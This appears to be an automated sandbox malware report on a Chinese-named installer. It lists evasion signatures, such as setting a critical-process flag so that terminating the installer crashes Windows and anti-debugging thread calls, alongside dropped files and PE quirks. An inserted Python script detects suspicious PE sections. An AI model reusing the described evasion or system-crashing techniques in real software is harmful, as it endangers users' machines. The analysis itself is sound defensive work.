Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1831583959.0000000003740000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1831723417.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C15AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C15AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_009F6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_009F7496
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: 01 00 00 00 (the value written is the DWORD 1; in this signature category that is the ProcessBreakOnTermination flag, which marks the process as critical so that terminating it bugchecks Windows)

System Summary

Source: update.vac.1.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C165120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C165D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE1950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code functions (potential crypto / string-decryption routines, one report entry each): 6_2_6BFF4A27, 6_2_6BFE4754, 6_2_6C161880, 6_2_6C166A43, 6_2_6C1C6CE0, 6_2_6C213D50, 6_2_6C219E80, 6_2_6C198EA1, 6_2_6C1B2EC9, 6_2_6C20E810, 6_2_6C22A930, 6_2_6C198972, 6_2_6C2199F0, 6_2_6C20FA50, 6_2_6C211AA0, 6_2_6C224AA0, 6_2_6C20DAD0, 6_2_6C1B0B66, 6_2_6C1A0BCA, 6_2_6C1B540A, 6_2_6C212580, 6_2_6C21F5C0, 6_2_6C2196E0, 6_2_6C239700, 6_2_6C19C7CF, 6_2_6C210020, 6_2_6C223750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code functions (one report entry each): 10_2_00A381EC, 10_2_00A0E00A, 10_2_00A781C0, 10_2_00A722E0, 10_2_00A88240, 10_2_00A8C3C0, 10_2_00A92300, 10_2_00A5E49F, 10_2_00A804C8, 10_2_00A725F0, 10_2_00A6A6A0, 10_2_00A666D0, 10_2_00A68650, 10_2_00A8E990, 10_2_00A40943, 10_2_00A6C950, 10_2_00A72A80, 10_2_00A4AB11, 10_2_00A76CE0, 10_2_00A68C20, 10_2_00A84EA0, 10_2_00A80E00, 10_2_00A510AC, 10_2_00A7D089, 10_2_00A6B180, 10_2_00A75180, 10_2_00A891C0, 10_2_00A6D1D0, 10_2_00A5B121, 10_2_00A81120, 10_2_00A8D2C0, 10_2_00A87200, 10_2_00A7F3A0, 10_2_00A1B3E4, 10_2_009F53CF, 10_2_00A553F3, 10_2_00A8F3C0, 10_2_00A3D496, 10_2_00A854D0, 10_2_00A7F420, 10_2_00A67410, 10_2_00A8D470, 10_2_00A8F599, 10_2_00A83530, 10_2_00A6F500, 10_2_00A9351A, 10_2_009F1572, 10_2_00A81550, 10_2_00A7D6A0, 10_2_00A93601, 10_2_00A49652, 10_2_009F97CA, 10_2_00A877C0, 10_2_00A09766, 10_2_00A1F8E0, 10_2_00A8D9E0, 10_2_00A6F910, 10_2_009F1AA1, 10_2_00A43AEF, 10_2_00A77AF0, 10_2_00A0BAC9, 10_2_00A0BC92, 10_2_00A77C50, 10_2_00A6FDF0, 10_2_00A75E80, 10_2_00A75F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: String function: 6C199240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: String function: 6C236F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 009F28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 009F1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A8FB10 appears 720 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: Number of sections : 11 > 10
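The static PE findings above (section name ".=~" in update.vac and hrsw.vbc, 11 sections in the installer .tmp and .exe, and a PE32+ image stored as an RT_RCDATA resource) can be reproduced with a few dozen lines of header parsing. The script below is an added example, not code from the Joe Sandbox report or from the analysed sample; the allowed-character set, the 10-section threshold and the build_pe() fixture are assumptions made for the example, and the PE images it inspects are constructed inline so it runs offline.

```python
"""Added example (not from the Joe Sandbox report or the analysed sample): a
minimal PE section-table parser that reproduces the report's two static checks
(a section name made of special characters, more than 10 sections) and a byte
scanner for embedded PE images such as a PE32+ executable stored in RT_RCDATA.
All PE fixtures are constructed by build_pe() (headers only, no code)."""
from __future__ import annotations

import struct

# Characters normal toolchains use in section names (assumption); anything else is worth a look.
ALLOWED_NAME_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")
MAX_NORMAL_SECTIONS = 10  # the report's own threshold: "Number of sections : 11 > 10"
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def parse_sections(image: bytes) -> list[str]:
    """Return the section names of a PE image; raise ValueError on a malformed header."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    names = []
    for i in range(nsections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; the name is its first 8
        if off + 40 > len(image):
            raise ValueError("section table truncated")
        names.append(image[off:off + 8].rstrip(b"\0").decode("latin-1"))
    return names


def suspicious_sections(image: bytes) -> tuple[list[str], list[str]]:
    """Apply the report's two static checks and return (section names, findings)."""
    names = parse_sections(image)
    findings = []
    if len(names) > MAX_NORMAL_SECTIONS:
        findings.append(f"Number of sections : {len(names)} > {MAX_NORMAL_SECTIONS}")
    for name in names:
        if not name or any(c not in ALLOWED_NAME_CHARS for c in name):
            findings.append(f"section name with special chars: {name!r}")
    return names, findings


def find_embedded_pe(blob: bytes, start: int = 1) -> list[tuple[int, str]]:
    """Offsets (and machine type) of PE images found past the outer header, e.g. in RT_RCDATA."""
    hits = []
    pos = blob.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(blob):
            lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + lfanew
            if 0x40 <= lfanew < 0x1000 and blob[sig:sig + 4] == b"PE\0\0" and sig + 6 <= len(blob):
                machine = struct.unpack_from("<H", blob, sig + 4)[0]
                hits.append((pos, "x86-64" if machine == IMAGE_FILE_MACHINE_AMD64 else hex(machine)))
        pos = blob.find(b"MZ", pos + 1)
    return hits


def build_pe(section_names: list[str], machine: int = IMAGE_FILE_MACHINE_I386) -> bytes:
    """Constructed fixture: a header-only PE with the given section names (not a real binary)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = b"\0" * 224  # size of a PE32 optional header; its contents are irrelevant here
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, len(optional), 0x102)
    table = b"".join(n.encode("latin-1").ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos_header + b"PE\0\0" + coff + optional + table


if __name__ == "__main__":
    sample = build_pe([".text", ".rdata", ".data", ".rsrc", ".reloc", ".tls",
                       ".idata", ".edata", ".pdata", ".bss", ".=~"])
    names, findings = suspicious_sections(sample)
    for f in findings:
        print("Static PE information:", f)
    carrier = build_pe([".text"]) + b"\0" * 16 + build_pe([".text"], IMAGE_FILE_MACHINE_AMD64)
    print("embedded PE images:", find_embedded_pe(carrier))
```

On a real dropped file, pass the bytes of update.vac or the .tmp to suspicious_sections(); the ".=~" name the report shows may itself be a sanitised rendering of non-printable bytes, which the same check catches because they fall outside the allowed set.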
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F87A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000000.1698759203.0000000000769000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000034FE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C165D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00A03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C165240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\is-A5GFB.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created (one entry per conhost instance, each named \BaseNamedObjects\Local\SM0:N:120:WilError_03 unless marked as living under \Sessions\1\BaseNamedObjects\Local), with N = 5472, 7824, 8144, 5768, 7768, 8088, 7744, 7988, 7720, 7840 (\Sessions\1), 7708, 7768 (\Sessions\1), 7488, 4296, 2692, 7624, 5432, 5164, 4624, 7764, 7996, 8072, 7356 (\Sessions\1), 8148, 4040, 984, 332, 7332, 5100, 180, 2588, 7932, 7752, 7944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 entries)
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 entries)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 entries)
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
